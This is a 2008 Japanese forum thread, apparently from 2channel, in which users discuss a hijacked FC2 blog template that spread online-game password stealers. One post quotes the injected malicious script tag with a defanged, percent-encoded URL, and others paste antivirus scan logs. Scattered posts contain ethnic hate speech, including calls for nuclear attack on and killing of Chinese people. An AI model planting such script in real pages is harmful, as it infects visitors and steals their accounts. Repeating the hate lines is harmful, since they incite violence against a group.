40 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:37:53.33 ID:0CiVccUT
>>21
テンプレ改竄問題は知ってたけど、
ウチがテンプレ改竄されたの今知って飛んで来たところなんだが
毎日毎日業者のコメントがウザかったので丁度数日前にhttp://をNGワードにしたんだよな
その報復なんだろうか
でテンプレチェックしてるんだけど、どう直せばいいのか教えて欲しいんだが
テンプレには%77とか入ってないぞ?
テンプレ改竄問題は知ってたけど、
ウチがテンプレ改竄されたの今知って飛んで来たところなんだが
毎日毎日業者のコメントがウザかったので丁度数日前にhttp://をNGワードにしたんだよな
その報復なんだろうか
でテンプレチェックしてるんだけど、どう直せばいいのか教えて欲しいんだが
テンプレには%77とか入ってないぞ?
41 :既にその名前は使われています:2008/03/24(月) 04:38:13.47 ID:8jcNID1A
ノートンが検出できない4種類のファイルを検体としてシマンテックに送付した
42 :既にその名前は使われています:2008/03/24(月) 04:38:46.92 ID:TfhGREOv
43 :既にその名前は使われています:2008/03/24(月) 04:39:47.13 ID:Xxx+f+/4
粘着っつうか、過剰擁護に反論してるだけだろ
44 :既にその名前は使われています:2008/03/24(月) 04:40:06.77 ID:Q/ktx4QO
>>34
fc2がテンプレートの配布と利用を止めたらどうなるかね?
読めないのを不思議に思って、読者は何かするんじゃないか?
まぁ、何もしない読者だから感染するんだけどさ。
「ブログ主が注意勧告するのはベターだ」が、
自責としてメインで動くべきは運営側であろう?
fc2がテンプレートの配布と利用を止めたらどうなるかね?
読めないのを不思議に思って、読者は何かするんじゃないか?
まぁ、何もしない読者だから感染するんだけどさ。
「ブログ主が注意勧告するのはベターだ」が、
自責としてメインで動くべきは運営側であろう?
45 :既にその名前は使われています:2008/03/24(月) 04:43:33.34 ID:8jcNID1A
46 :既にその名前は使われています:2008/03/24(月) 04:43:37.03 ID:Df86aKNo
47 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:44:07.46 ID:0CiVccUT
というかもう直ってるの?>>21でしれっと直してって書いてあるんだけど
俺は何も弄ってないんだけどな
3週間くらい前だったかな?ブログにFC2のブログがハックされて〜
ヴァナモンさんも注意してくださいってブログにコメントくれた人が居たんだよね
でその時もチェックしたけどそれっぽいのは無かったし
俺は何も弄ってないんだけどな
3週間くらい前だったかな?ブログにFC2のブログがハックされて〜
ヴァナモンさんも注意してくださいってブログにコメントくれた人が居たんだよね
でその時もチェックしたけどそれっぽいのは無かったし
48 :既にその名前は使われています:2008/03/24(月) 04:44:15.26 ID:juaPfmeM
49 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 04:45:27.27 ID:0CiVccUT
とりあえず前スレを確認してきます
50 :既にその名前は使われています:2008/03/24(月) 04:49:01.17 ID:vQXYTLxz
しれっと直してやのその事実を個人レベルで隠蔽するような行為やの書いてる
奴は叩きと認識されるでそ。
FF取り上げる全てのサイトやネ実でななしやロカルーででかでかと注意喚起すべき
だろうけどね。
奴は叩きと認識されるでそ。
FF取り上げる全てのサイトやネ実でななしやロカルーででかでかと注意喚起すべき
だろうけどね。
51 :既にその名前は使われています:2008/03/24(月) 04:49:45.63 ID:rpE40Jdl
iframeもなかったのかな。勝手に消えたって、業者が埋め込んでまた消すってあるのかな???
52 :既にその名前は使われています:2008/03/24(月) 04:50:12.06 ID:uo1cC9cX
ここまで、話題になったんだから、国レベルで、どうにかしてほしいもんだ
53 :既にその名前は使われています:2008/03/24(月) 04:53:02.27 ID:5r7sQEdf
中国人は最近ではチベットの件とかいろいろ物議醸し出してるからなぁ
それでなくても「中国、韓国お断り」は俺の知ってる世界では常識だし
国レベルで中国に核を落としてくれたらいいのにね
それでなくても「中国、韓国お断り」は俺の知ってる世界では常識だし
国レベルで中国に核を落としてくれたらいいのにね
54 :既にその名前は使われています:2008/03/24(月) 04:53:53.96 ID:QCo+vR7/
>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ
ここは私も気になる所です
ブログのテンプレはDL以降、ブロガー個人での管理になるから
有名ブログのテンプレ改竄はブログ管理のID・passの漏洩によって
発生する場合が大半だと思っていたけど実際はどうなんでしょうか?
悪意のあるテンプレートが公開されているケースもないとは言えませんが
>改ざんしたテンプレートを運営者に出したやつ
ここは私も気になる所です
ブログのテンプレはDL以降、ブロガー個人での管理になるから
有名ブログのテンプレ改竄はブログ管理のID・passの漏洩によって
発生する場合が大半だと思っていたけど実際はどうなんでしょうか?
悪意のあるテンプレートが公開されているケースもないとは言えませんが
55 :既にその名前は使われています:2008/03/24(月) 04:54:41.34 ID:dI49kwAF
56 :既にその名前は使われています:2008/03/24(月) 04:55:15.07 ID:Q/ktx4QO
中国自体が核保有国だから、なんかしでかしてくれるのを期待したいw
57 :既にその名前は使われています:2008/03/24(月) 04:56:23.92 ID:A+UNPr50
>>47
エントリーのブロックが終わって
<<--!コメント-->>の直下に
<script language="javascript"
src="hxxp://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
こんなんがあった
本来はhttpだったが誤アクセス防止にxxにしといた。
本人が直したんじゃないってことはグーグルに気づかれたために業者が直したかのかな
ヴァナモンをグーグルで検索すると危険サイトに指定されている。
エントリーのブロックが終わって
<<--!コメント-->>の直下に
<script language="javascript"
src="hxxp://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
こんなんがあった
本来はhttpだったが誤アクセス防止にxxにしといた。
本人が直したんじゃないってことはグーグルに気づかれたために業者が直したかのかな
ヴァナモンをグーグルで検索すると危険サイトに指定されている。
58 :前スレ969:2008/03/24(月) 04:57:03.38 ID:Vn0/fEwr
>>42
おお、ありがとう。
家族がネットでの自己防衛に無頓着&家族にすらPC触らせたがらないんで心配だったんよ(´・ω・`)
大丈夫そうなんで、当分の間HUBはいまの機械使っておくよ。
さすがにやばいんで寝る。
夜までこのスレが生き残っていることを祈りつつあげ!
おお、ありがとう。
家族がネットでの自己防衛に無頓着&家族にすらPC触らせたがらないんで心配だったんよ(´・ω・`)
大丈夫そうなんで、当分の間HUBはいまの機械使っておくよ。
さすがにやばいんで寝る。
夜までこのスレが生き残っていることを祈りつつあげ!
59 :既にその名前は使われています:2008/03/24(月) 04:58:18.68 ID:A+UNPr50
60 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 05:02:56.71 ID:0CiVccUT
3/19の夜にhttp://をNGワードにしたんだよな
それからパッタリ業者のコメント無くなってたんだが
それの報復ぽよなぁ。
となると3/19以降に仕掛けられた可能性が高いと思う。
つーか他のFC2のサイトと違うテンプレ使ってるし
防ごうとして防げるのこれ?
それからパッタリ業者のコメント無くなってたんだが
それの報復ぽよなぁ。
となると3/19以降に仕掛けられた可能性が高いと思う。
つーか他のFC2のサイトと違うテンプレ使ってるし
防ごうとして防げるのこれ?
61 :既にその名前は使われています:2008/03/24(月) 05:03:26.19 ID:l9SAEJ0+
62 :既にその名前は使われています:2008/03/24(月) 05:04:26.58 ID:A+UNPr50
>>60
テンプレ何つかってるとかそういう問題じゃない
あとNGとか関係ねーとおもうよ
割とアクセス多いところを狙ってるみたいだし
最初は検索トップにでるサイトだけだったが
今はなりふり構わず無差別になりつつある
テンプレ何つかってるとかそういう問題じゃない
あとNGとか関係ねーとおもうよ
割とアクセス多いところを狙ってるみたいだし
最初は検索トップにでるサイトだけだったが
今はなりふり構わず無差別になりつつある
63 :既にその名前は使われています:2008/03/24(月) 05:05:16.22 ID:mrzccnLo
64 :既にその名前は使われています:2008/03/24(月) 05:05:57.77 ID:rpE40Jdl
報復ってより、今はどこもコメント承認制だったりで
てっとり早く感染させられる改竄の方主流にしだしたとかかもですね
てっとり早く感染させられる改竄の方主流にしだしたとかかもですね
65 :既にその名前は使われています:2008/03/24(月) 05:06:05.62 ID:Q/ktx4QO
66 :既にその名前は使われています:2008/03/24(月) 05:06:33.24 ID:Df86aKNo
67 :既にその名前は使われています:2008/03/24(月) 05:09:43.58 ID:Q/ktx4QO
>>61
うひ、誰ぞサイトアドバイザに報告したのがいるんだわw
うひ、誰ぞサイトアドバイザに報告したのがいるんだわw
68 :ヴァナm ◆ZrzGMHfgII :2008/03/24(月) 05:20:56.66 ID:0CiVccUT
えーとそれで、ウチ見て感染した場合はカスペルキーとかいうのでチェックがいいのかな?
普通のウイルススキャンじゃ引っかからない?
googleのキャッシュはブログが有害指定されてるから無いっぽいので
いつのキャッシュから判断してるのか分からないけど
土曜の深夜に誰か気づいたってことは、仕込まれたのやっぱ先週中頃以降じゃないのかなぁ
ヴァナモンで検索して>>61になったら誰かすぐ気づくだろうし
普通のウイルススキャンじゃ引っかからない?
googleのキャッシュはブログが有害指定されてるから無いっぽいので
いつのキャッシュから判断してるのか分からないけど
土曜の深夜に誰か気づいたってことは、仕込まれたのやっぱ先週中頃以降じゃないのかなぁ
ヴァナモンで検索して>>61になったら誰かすぐ気づくだろうし
69 :既にその名前は使われています:2008/03/24(月) 05:21:04.67 ID:Q/ktx4QO
時期と手口からすると、これ近いんじゃないかと思ったり。
ttp://www.itmedia.co.jp/news/articles/0803/14/news018.html
ttp://www.itmedia.co.jp/news/articles/0803/14/news018.html
70 :既にその名前は使われています:2008/03/24(月) 05:24:10.66 ID:Q/ktx4QO
>>68
今まで検出してくれた報告があるのは、カスペルスキーだけですな。
オンライン版
ttp://www.kaspersky.co.jp/virusscanner
体験版
ttp://www.kaspersky.co.jp/trials
を紹介しておくとよいかも?
今まで検出してくれた報告があるのは、カスペルスキーだけですな。
オンライン版
ttp://www.kaspersky.co.jp/virusscanner
体験版
ttp://www.kaspersky.co.jp/trials
を紹介しておくとよいかも?
71 :既にその名前は使われています:2008/03/24(月) 05:25:08.58 ID:zadZE9R9
管理できないなら削除しろ
大きな被害でてるぞ
大きな被害でてるぞ
72 :既にその名前は使われています:2008/03/24(月) 05:26:24.57 ID:XNnaYNDD
ほんとに業者やりたい放題だな
FC2運営内部にRMT関係者か金を貰って工作している奴がいるとしか思えん
対策出来ない以上はblogを見ないという選択肢しか無いじゃん
FC2運営内部にRMT関係者か金を貰って工作している奴がいるとしか思えん
対策出来ない以上はblogを見ないという選択肢しか無いじゃん
73 :既にその名前は使われています:2008/03/24(月) 05:28:54.65 ID:l9SAEJ0+
今の所ブログのみで、
HPコンテンツ等のメインサーチの方は
改ざんなさそうだね。
HPコンテンツ等のメインサーチの方は
改ざんなさそうだね。
74 :既にその名前は使われています:2008/03/24(月) 05:30:14.79 ID:nn2RN4KX
>>69
そこのサイトの過去の記事ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news112.html
に、同社によれば、このマルウェアはオンラインゲームの情報をPCから盗み出すタイプだと推定されるという。
という件があるな。
そこのサイトの過去の記事ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news112.html
に、同社によれば、このマルウェアはオンラインゲームの情報をPCから盗み出すタイプだと推定されるという。
という件があるな。
75 :既にその名前は使われています:2008/03/24(月) 05:31:10.21 ID:dI49kwAF
落ち着くまで、パスワードかけて非公開にしとくとか。
パス認証画面が安全かどうかは分からんのだが。
パス認証画面が安全かどうかは分からんのだが。
76 :既にその名前は使われています:2008/03/24(月) 05:43:24.08 ID:f8U+hHlG
77 :既にその名前は使われています:2008/03/24(月) 05:51:44.38 ID:sV5MTkg6
ヴァナモンブログが利用していたテンプレートに最近何か仕込まれて、今日までにかなり感染した。
現在では、そのテンプレートは何も仕込まれてないものに修正されている。
こういうことか?
テンプレの提供元であるfc2に問題があると?
現在では、そのテンプレートは何も仕込まれてないものに修正されている。
こういうことか?
テンプレの提供元であるfc2に問題があると?
78 :既にその名前は使われています:2008/03/24(月) 06:01:37.22 ID:9jGDstCn
"%77%77%77%2E%〜" ってのは普通の人間はぱっと見が書かれてるか判らん罠。
URLを16進コードで書いたもので"www.〜"ってコトなんだけど
ブラウザが自動変換してたら%77で検索しても意味無いかも。
>>57に書かれてる謎の文字列を変換するとhellh■netへのurlになる。
URLを16進コードで書いたもので"www.〜"ってコトなんだけど
ブラウザが自動変換してたら%77で検索しても意味無いかも。
>>57に書かれてる謎の文字列を変換するとhellh■netへのurlになる。
79 :既にその名前は使われています:2008/03/24(月) 06:31:03.34 ID:8CSFG+dl
こんな時間に新スレ移行したのか、いちおつ。
もしかしたらまとめの人がログ取り切れてないかもしれないから、
誰か一応前スレのログを保存しといてくれ。俺は携帯なんでできないんだ
もしかしたらまとめの人がログ取り切れてないかもしれないから、
誰か一応前スレのログを保存しといてくれ。俺は携帯なんでできないんだ
80 :既にその名前は使われています:2008/03/24(月) 06:41:19.69 ID:QCo+vR7/
FC2から公開されている段階のテンプレには(おそらく)問題なく、
テンプレをDLした後に、ブログの管理画面で利用者(ブロガー)個人がテンプレの
ソースを改変することが出来るから、そこで改竄されたんだと思っています。
FC2ブログの管理画面に行く際に必要なIDとpassの内
IDはそのブログURLの一部に使われているから一目瞭然で、passだけ判明してしまえば
ブログ管理画面にいけてしまうんですよね
passだけなら総当りで試行すれば簡単に一致してしまいそうな気が…
私もFC2でブログを書いているんですが、これを気に閉鎖しようと思っています
テンプレをDLした後に、ブログの管理画面で利用者(ブロガー)個人がテンプレの
ソースを改変することが出来るから、そこで改竄されたんだと思っています。
FC2ブログの管理画面に行く際に必要なIDとpassの内
IDはそのブログURLの一部に使われているから一目瞭然で、passだけ判明してしまえば
ブログ管理画面にいけてしまうんですよね
passだけなら総当りで試行すれば簡単に一致してしまいそうな気が…
私もFC2でブログを書いているんですが、これを気に閉鎖しようと思っています
81 :既にその名前は使われています:2008/03/24(月) 06:57:03.29 ID:hdKDzAOI
試しにカスペルスキーのオンラインスキャンしたら
こんな物が引っかかったのだけれど…
ググってもよくわからん
not-a-virus:PSWTool.Win32.Messen.n
これってやられちゃってる?(ノω`)
こんな物が引っかかったのだけれど…
ググってもよくわからん
not-a-virus:PSWTool.Win32.Messen.n
これってやられちゃってる?(ノω`)
82 :既にその名前は使われています:2008/03/24(月) 07:01:42.72 ID:JYmJyemP
カスペ関連で一気にFF潰せそうな勢いだなの
83 :既にその名前は使われています:2008/03/24(月) 07:04:39.69 ID:n0XTFGnb
中国人を 一日3人まで殺しても 罪にはなりません^^
84 :既にその名前は使われています:2008/03/24(月) 07:18:44.68 ID:A+UNPr50
85 :既にその名前は使われています:2008/03/24(月) 07:22:21.89 ID:rCHR+RwE
おはようございます。起きたら終わってました。
報告です。
ターゲットの選択: マイ コンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;
E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\H8OJH9OT\t1[1].exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\SBT7I6Z1\ff11[1].exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\Program Files\Common Files\Microsoft Shared\MSInfo\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067565.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067628.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067790.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067872.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068007.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068071.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068284.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068370.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
報告です。
ターゲットの選択: マイ コンピュータ
ソース: A:\; C:\; D:\; E:\; F:\; G:\;
E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\H8OJH9OT\t1[1].exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\SBT7I6Z1\ff11[1].exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\Program Files\Common Files\Microsoft Shared\MSInfo\SysInfo.wmp 感染: Trojan-Downloader.Win32.Delf.dsz スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067565.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP582\A0067628.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067790.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP583\A0067872.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068007.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068071.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068284.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP584\A0068370.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
86 :既にその名前は使われています:2008/03/24(月) 07:23:29.42 ID:rCHR+RwE
続きです
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP585\A0068454.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069244.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069282.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069295.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069311.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069323.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069332.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069333.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069345.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069346.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP585\A0068454.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069244.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069282.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069295.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP589\A0069311.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069323.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069332.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP590\A0069333.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069345.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\System Volume Information\_restore{E3A36D7D-F122-49F9-AD62-7D0B869BF01B}\RP591\A0069346.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
87 :既にその名前は使われています:2008/03/24(月) 07:25:18.69 ID:rCHR+RwE
E:\WINDOWS\Help\3EC849F38E63.dll 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr スキップ
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
これで一応全部オンラインスキャンが終わりました。
1つづつ探して何か別の場所に保存して
http://www.mcafee.com/japan/security/contactavert.aspへ送れば良いんでしょうか?
E:\WINDOWS\Help\3EC849F38E63.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\1.exe 感染: Trojan-PSW.Win32.OnLineGames.lbb スキップ
E:\WINDOWS\system32\2.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\explorerf.exe 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
E:\WINDOWS\system32\krnp32drv.dll 感染: Trojan-PSW.Win32.OnLineGames.pnr スキップ
E:\WINDOWS\system32\systemlf.dll 感染: Trojan-PSW.Win32.OnLineGames.fcj スキップ
これで一応全部オンラインスキャンが終わりました。
1つづつ探して何か別の場所に保存して
http://www.mcafee.com/japan/security/contactavert.aspへ送れば良いんでしょうか?
88 :80:2008/03/24(月) 07:30:20.21 ID:QCo+vR7/
>>84
私の場合、URLの//(ダブルスラッシュ)直後とブログIDが一緒なのですが
他の方は違うor変更することもできるのでしょうか。
間違っていた事を書き込んでしまっていたら申し訳ありません。
スルーしてください(´・ω・`)
私の場合、URLの//(ダブルスラッシュ)直後とブログIDが一緒なのですが
他の方は違うor変更することもできるのでしょうか。
間違っていた事を書き込んでしまっていたら申し訳ありません。
スルーしてください(´・ω・`)
89 :既にその名前は使われています:2008/03/24(月) 07:48:39.60 ID:vtt50urT
>>87
>>87 のだけでいいよ。他は復元の領域(触れない)や
IEのキャッシュ(一時ファイル消せば消える)で重複してる。
McAfee使ってるなら送り先はそこのメールで。
WebImmuneには俺アップしてるんだけど、どうも放置されてる。
>>87 のだけでいいよ。他は復元の領域(触れない)や
IEのキャッシュ(一時ファイル消せば消える)で重複してる。
McAfee使ってるなら送り先はそこのメールで。
WebImmuneには俺アップしてるんだけど、どうも放置されてる。
90 :既にその名前は使われています:2008/03/24(月) 07:51:12.33 ID:vtt50urT
91 :既にその名前は使われています:2008/03/24(月) 07:54:00.87 ID:MKZHUFJz
92 :既にその名前は使われています:2008/03/24(月) 07:54:55.32 ID:rCHR+RwE
>>89
わかりました、探してまずは圧縮してみます<(_ _)>
わかりました、探してまずは圧縮してみます<(_ _)>
93 :80:2008/03/24(月) 08:06:40.96 ID:QCo+vR7/
94 :既にその名前は使われています:2008/03/24(月) 08:08:45.04 ID:rCHR+RwE
あと気になったファイルがあったので載せておきますね。
オンラインスキャンの結果をメールで報告するトコがありますよね?
出てきたファイルが↓です。
kavonline0.vir
kavonline1.vir
kavonline2.vir
kavonline3.vir
kavonline4.vir
kavonline5.vir
kavonline6.vir
どこにあったのかまではわかりませんでした。
オンラインスキャンの結果をメールで報告するトコがありますよね?
出てきたファイルが↓です。
kavonline0.vir
kavonline1.vir
kavonline2.vir
kavonline3.vir
kavonline4.vir
kavonline5.vir
kavonline6.vir
どこにあったのかまではわかりませんでした。
95 :既にその名前は使われています:2008/03/24(月) 08:09:36.93 ID:wiMjf6Lx
Mac用のPG2みたいなソフトないですか…
96 :既にその名前は使われています:2008/03/24(月) 08:15:42.99 ID:vc86vULj
>>88の言いたい事が何となく分かる。
ブログ取得するのに確かにFC2IDが必要で、それは登録したメルアドなんだけど
ブログ取得する際にブログIDが発行されて、それはブログのアドレスに組み込まれてる
ttp://ブログID.blog××.fc2.com/
こんな感じに。
で、プラグインのリンクを使ってると、リンクの一番下に管理者ページの入り口があって
そこで求められるのは、FC2IDかブログID、どっちでも良いんだ。パスワードは両者共通。
分かりにくかったら、適当なFC2のブログから管理者ページに飛んで見てもらいたい
このへんがFC2が狙われる理由なんじゃないかと思っている。
…見当違いの事言ってたら済みません。
ブログ取得するのに確かにFC2IDが必要で、それは登録したメルアドなんだけど
ブログ取得する際にブログIDが発行されて、それはブログのアドレスに組み込まれてる
ttp://ブログID.blog××.fc2.com/
こんな感じに。
で、プラグインのリンクを使ってると、リンクの一番下に管理者ページの入り口があって
そこで求められるのは、FC2IDかブログID、どっちでも良いんだ。パスワードは両者共通。
分かりにくかったら、適当なFC2のブログから管理者ページに飛んで見てもらいたい
このへんがFC2が狙われる理由なんじゃないかと思っている。
…見当違いの事言ってたら済みません。
97 :既にその名前は使われています:2008/03/24(月) 08:36:21.56 ID:HWQPHJQs
>>96あってるとおもうよ
98 :既にその名前は使われています:2008/03/24(月) 08:40:55.56 ID:h9kMfdX+
99 :既にその名前は使われています:2008/03/24(月) 08:42:27.44 ID:Q/ktx4QO
>>85
おつかれさん。仮眠して少しは落ち着いたかな?
まずは、サポセンに電話して、アカウントを丸ごと止めさせるんだ。
次に、PCをネットからケーブルごと引っこ抜け。
感染している以上、外部から完全に掌握されていると思ってくれ。
それから、ブラウザの履歴見て、PCの動作ががつんと重くなったと
感じたあたりを思い出してみて。
ポイント的には、なんちゃら.jp以外のところ。
そして、ワームの検体の提出を考えるのは最後にすること。
なぜなら、既に検出できてるわけだから、カスペルスキーは対応できてる。
どれを検体とするかは、リストから拾っとくよ。
おつかれさん。仮眠して少しは落ち着いたかな?
まずは、サポセンに電話して、アカウントを丸ごと止めさせるんだ。
次に、PCをネットからケーブルごと引っこ抜け。
感染している以上、外部から完全に掌握されていると思ってくれ。
それから、ブラウザの履歴見て、PCの動作ががつんと重くなったと
感じたあたりを思い出してみて。
ポイント的には、なんちゃら.jp以外のところ。
そして、ワームの検体の提出を考えるのは最後にすること。
なぜなら、既に検出できてるわけだから、カスペルスキーは対応できてる。
どれを検体とするかは、リストから拾っとくよ。
普通はIDとパス記憶させるのは (クッキーじゃなくて)オートコンプリートの方じゃないかな
ってことね
オートコンプリート履歴とクッキーは別物だから、それぞれ別の手順で削除しないとダメ
ってことね
オートコンプリート履歴とクッキーは別物だから、それぞれ別の手順で削除しないとダメ
101 :既にその名前は使われています:2008/03/24(月) 08:45:50.22 ID:rCHR+RwE
おはようございます<(_ _)>
>>99
上から順番に読んできましたが前スレの>>168の方と同じ症状がありましたorz
2週間前ぐらいに時計が2000年と表示されてたのを覚えています。
?と思ったんですが、気がついたときには元に戻っていたのでそのままにしておきました…
十日前にココを見ていれば防げたかもしれませんね…いまさらですがorz
サポートセンターが空くまで時間がありますので少し情報?を
攻略サイトでよく見ていたところはからくりwikiぐらいです。
それと、からくりを上げてる人のブログを2〜3箇所回りましたが覚えていませんorz
Yahooやグーグルの検索で出てきたところを見た気がします。
良く行くサイトはYouTubeとニコニコです。
その他のサイトはほとんどスレに貼られたアドレスから飛んでいました。
P2Pというとウィンニーやシェアでしょうか?
友人に勧められてインストールしましたが、設定がわからないので使った事はありません。
>>99
上から順番に読んできましたが前スレの>>168の方と同じ症状がありましたorz
2週間前ぐらいに時計が2000年と表示されてたのを覚えています。
?と思ったんですが、気がついたときには元に戻っていたのでそのままにしておきました…
十日前にココを見ていれば防げたかもしれませんね…いまさらですがorz
サポートセンターが空くまで時間がありますので少し情報?を
攻略サイトでよく見ていたところはからくりwikiぐらいです。
それと、からくりを上げてる人のブログを2〜3箇所回りましたが覚えていませんorz
Yahooやグーグルの検索で出てきたところを見た気がします。
良く行くサイトはYouTubeとニコニコです。
